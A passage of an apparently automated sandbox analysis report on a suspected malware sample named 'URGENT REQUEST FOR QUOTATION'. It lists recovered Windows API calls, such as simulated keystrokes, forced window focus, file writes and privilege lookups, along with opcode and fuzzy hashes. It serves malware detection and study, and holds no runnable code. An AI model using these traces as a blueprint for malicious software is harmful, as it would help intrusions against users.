                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: e8ac91139ebc5a29214dcae2b28008761a7707ff040eebd57ee1e4580894b571
                                                                                                                      • Instruction ID: c7a961da7ba74a8eea4a4480a9a8b452bee9e9df7cb7bf2f24276c1d8ab9ce19
                                                                                                                      • Opcode Fuzzy Hash: e8ac91139ebc5a29214dcae2b28008761a7707ff040eebd57ee1e4580894b571
                                                                                                                      • Instruction Fuzzy Hash: E6E0ED31100325AEE6B12AA79C05FDB36CBAB42BB1F090020BC0997882CF20DE0283E0
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034F6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: 53b503a3fb90df7fc348535233af26cda23a6626b4848742ca80f959ed399127
                                                                                                                      • Instruction ID: 9adcd4b3f8b7ee8ccdd952d217ad36e4a9c336483b3eccf453c3211ffb1345c2
                                                                                                                      • Opcode Fuzzy Hash: 53b503a3fb90df7fc348535233af26cda23a6626b4848742ca80f959ed399127
                                                                                                                      • Instruction Fuzzy Hash: E1F0A070105741CFDB358F21D490C16B7E8EF0131971889BEE1DA86611C731A844DF00
                                                                                                                      APIs
                                                                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CD26
                                                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0009CD19,?,?,?), ref: 0009CC59
                                                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0009CD19,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CC6E
                                                                                                                        • Part of subcall function 0009CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0009CD19,?,?,?,?,0007EE51,000F3630,00000002), ref: 0009CC7A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Pointer$Write
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3847668363-0
                                                                                                                      • Opcode ID: 4425907bd8f25183dc22d19ae98addd062d82ba5c5e2308f02c4c540d070560b
                                                                                                                      • Instruction ID: baa6efb2bffc7c73dcae5b418c728bf1cedc8f2703017b874388c494a555f7b3
                                                                                                                      • Opcode Fuzzy Hash: 4425907bd8f25183dc22d19ae98addd062d82ba5c5e2308f02c4c540d070560b
                                                                                                                      • Instruction Fuzzy Hash: 8EE06576800704EFDB219F46DD00C9ABBF8FF85350710852FE955C2511D375AA14DB60
                                                                                                                      APIs
                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541455249-0
                                                                                                                      • Opcode ID: 4163f2e373f984726a274fbaf83e8f2b6cb25b521724e4bf321db737c308d89f
                                                                                                                      • Instruction ID: f582a338eb0050ae55fc1dab996f65211cc83c5b4fddbce87fb11994a618118f
                                                                                                                      • Opcode Fuzzy Hash: 4163f2e373f984726a274fbaf83e8f2b6cb25b521724e4bf321db737c308d89f
                                                                                                                      • Instruction Fuzzy Hash: D0E0CD72A001245BD7119358DC05FDA77DDDFC8790F044071FD0DD7249DA64AD808650
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00033837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                                                                                                        • Part of subcall function 0003D730: GetInputState.USER32 ref: 0003D807
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                                                                                                        • Part of subcall function 000330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0003314E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3667716007-0
                                                                                                                      • Opcode ID: aa514bd015a4dfb87d6036cdf4302bd9b3896c3021b3bf8e96c27b125b92dd48
                                                                                                                      • Instruction ID: 74228affa896e8904d69a360b7c78510c11a557d403032cfed734fd4a9d89c21
                                                                                                                      • Opcode Fuzzy Hash: aa514bd015a4dfb87d6036cdf4302bd9b3896c3021b3bf8e96c27b125b92dd48
                                                                                                                      • Instruction Fuzzy Hash: 7DE0CD3170424417C60ABB74B8929FDF75D9BD1351F40153EF186831B3DF6886454351
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 52a943f5dd3766a914dafb5122da9748fd219d19059f4adf793e752e663a982c
                                                                                                                      • Instruction ID: 4c96fc605a304f0ca85a1b9a6a37042152215434a045206b9e0219f59f331e3f
                                                                                                                      • Opcode Fuzzy Hash: 52a943f5dd3766a914dafb5122da9748fd219d19059f4adf793e752e663a982c
                                                                                                                      • Instruction Fuzzy Hash: F9D06C3204010DBBEF028F85DD06EDA3BAAFB48714F014000FE1856020C736E821AB90
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00031CBC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3098949447-0
                                                                                                                      • Opcode ID: 059d4c16c6d2c2bee22314bd767327ce0399ad672ebb96c1a8d67a6d62813a74
                                                                                                                      • Instruction ID: 3242a3fac7d8a8b178428c2f699ea7ad2ea5ecea0125562e59f0f1b837acabc8
                                                                                                                      • Opcode Fuzzy Hash: 059d4c16c6d2c2bee22314bd767327ce0399ad672ebb96c1a8d67a6d62813a74
                                                                                                                      • Instruction Fuzzy Hash: 5AC04836280304AAF2148B80AC4AF507764A348B10F048001F689A99E382E628A1AA54
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00035745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0003949C,?,00008000), ref: 00035773
                                                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 000A76DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1214770103-0
                                                                                                                      • Opcode ID: 9eb09486539eb74428d748ecd9fca7e1b5dfa055bb3f6a3fc3fcc8593c43f7ab
                                                                                                                      • Instruction ID: 37eb4c6ece485dceaf6af09d13cd395d71dc1011fbdab4b5cea77db132a56f11
                                                                                                                      • Opcode Fuzzy Hash: 9eb09486539eb74428d748ecd9fca7e1b5dfa055bb3f6a3fc3fcc8593c43f7ab
                                                                                                                      • Instruction Fuzzy Hash: 598194306087019FCB15EF64C891BADB7E5BF89314F04852DF8895B2A2DB70ED45CB52
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNELBASE(?,?,00000000,000724E0), ref: 00036266
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      • Opcode ID: 3fc327dab0e153dd22b4b725be35cfdcba644c8c12a56a845220016f172e9d62
                                                                                                                      • Instruction ID: 5cd43ea60c34be626aaa3b2757217ea7d6e7a30fd1b44f66c99dcd2c8af2bb3f
                                                                                                                      • Opcode Fuzzy Hash: 3fc327dab0e153dd22b4b725be35cfdcba644c8c12a56a845220016f172e9d62
                                                                                                                      • Instruction Fuzzy Hash: 6EE0B675400B01EFD3324F1AE804412FBF9FFE23613218A2ED1E692660D3B158868F50
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 01B64BF9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1794132776.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B62000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1b62000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: 5ddc9f5bb5657bbc2b2a10266e336780095d48ef85bc846a4937dd0e266cea36
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: 14E0E67494010DDFDB00DFB4D64969D7BF4EF04301F1001A1FD01D2281D7319D508A72
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 000C961A
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C965B
                                                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 000C969F
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C96C9
                                                                                                                      • SendMessageW.USER32 ref: 000C96F2
                                                                                                                      • GetKeyState.USER32(00000011), ref: 000C978B
                                                                                                                      • GetKeyState.USER32(00000009), ref: 000C9798
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 000C97AE
                                                                                                                      • GetKeyState.USER32(00000010), ref: 000C97B8
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000C97E9
                                                                                                                      • SendMessageW.USER32 ref: 000C9810
                                                                                                                      • SendMessageW.USER32(?,00001030,?,000C7E95), ref: 000C9918
                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 000C992E
                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 000C9941
                                                                                                                      • SetCapture.USER32(?), ref: 000C994A
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000C99AF
                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 000C99BC
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C99D6
                                                                                                                      • ReleaseCapture.USER32 ref: 000C99E1
                                                                                                                      • GetCursorPos.USER32(?), ref: 000C9A19
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000C9A26
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9A80
                                                                                                                      • SendMessageW.USER32 ref: 000C9AAE
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9AEB
                                                                                                                      • SendMessageW.USER32 ref: 000C9B1A
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 000C9B3B
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 000C9B4A
                                                                                                                      • GetCursorPos.USER32(?), ref: 000C9B68
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000C9B75
                                                                                                                      • GetParent.USER32(?), ref: 000C9B93
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 000C9BFA
                                                                                                                      • SendMessageW.USER32 ref: 000C9C2B
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000C9C84
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 000C9CB4
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 000C9CDE
                                                                                                                      • SendMessageW.USER32 ref: 000C9D01
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 000C9D4E
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 000C9D82
                                                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C9E05
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                      • API String ID: 3429851547-4164748364
                                                                                                                      • Opcode ID: f728b379de469172670057e36484afa83a5f3f9e9b218c0226fcc046fcc79fcb
                                                                                                                      • Instruction ID: 4ae8538a34313ba13e026138447850de0aabe5afe67c5335bb0757d0073c06b1
                                                                                                                      • Opcode Fuzzy Hash: f728b379de469172670057e36484afa83a5f3f9e9b218c0226fcc046fcc79fcb
                                                                                                                      • Instruction Fuzzy Hash: BA427834208201AFEB25CF28CD88FAEBBE5FF49314F14061DF699976A1D771A960CB51
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 000C48F3
                                                                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 000C4908
                                                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 000C4927
                                                                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 000C494B
                                                                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 000C495C
                                                                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 000C497B
                                                                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 000C49AE
                                                                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 000C49D4
                                                                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 000C4A0F
                                                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A56
                                                                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 000C4A7E
                                                                                                                      • IsMenu.USER32(?), ref: 000C4A97
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4AF2
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000C4B20
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 000C4B94
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 000C4BE3
                                                                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 000C4C82
                                                                                                                      • wsprintfW.USER32 ref: 000C4CAE
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4CC9
                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4CF1
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000C4D13
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000C4D33
                                                                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 000C4D5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                      • API String ID: 4054740463-328681919
                                                                                                                      • Opcode ID: f9f76f2ff18e5f2fed86d10df6a0f7fb682bee937c05ac2df9cd949c045df002
                                                                                                                      • Instruction ID: d5968f93b2617f8765b1ffe18ab7b52741b25716baf2c848df20d66d2f9030e1
                                                                                                                      • Opcode Fuzzy Hash: f9f76f2ff18e5f2fed86d10df6a0f7fb682bee937c05ac2df9cd949c045df002
                                                                                                                      • Instruction Fuzzy Hash: E212BC71A00215ABFB259F28CC59FAE7BF8FF45710F10412DF51AEA2A1DBB89941CB50
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0004F998
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0008F474
                                                                                                                      • IsIconic.USER32(00000000), ref: 0008F47D
                                                                                                                      • ShowWindow.USER32(00000000,00000009), ref: 0008F48A
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F494
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4AA
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0008F4B1
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0008F4BD
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4CE
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0008F4D6
                                                                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0008F4DE
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F4E1
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F4F6
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F501
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F50B
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F510
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F519
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F51E
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008F528
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0008F52D
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0008F530
                                                                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0008F557
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                      • Opcode ID: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                                                                                                      • Instruction ID: 6b534552e183d3afa7291f7dba52558037ffc53d3998300a6cda102c13a3ece0
                                                                                                                      • Opcode Fuzzy Hash: c64a61d6ed53b5cb59b1af0da091d7687be234c7091d72f25f83e7518499fab5
                                                                                                                      • Instruction Fuzzy Hash: F8314171A40218BBFB206BB59C4AFBF7EACEB44B50F10006AFA05E61D1C6B55D41AB60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
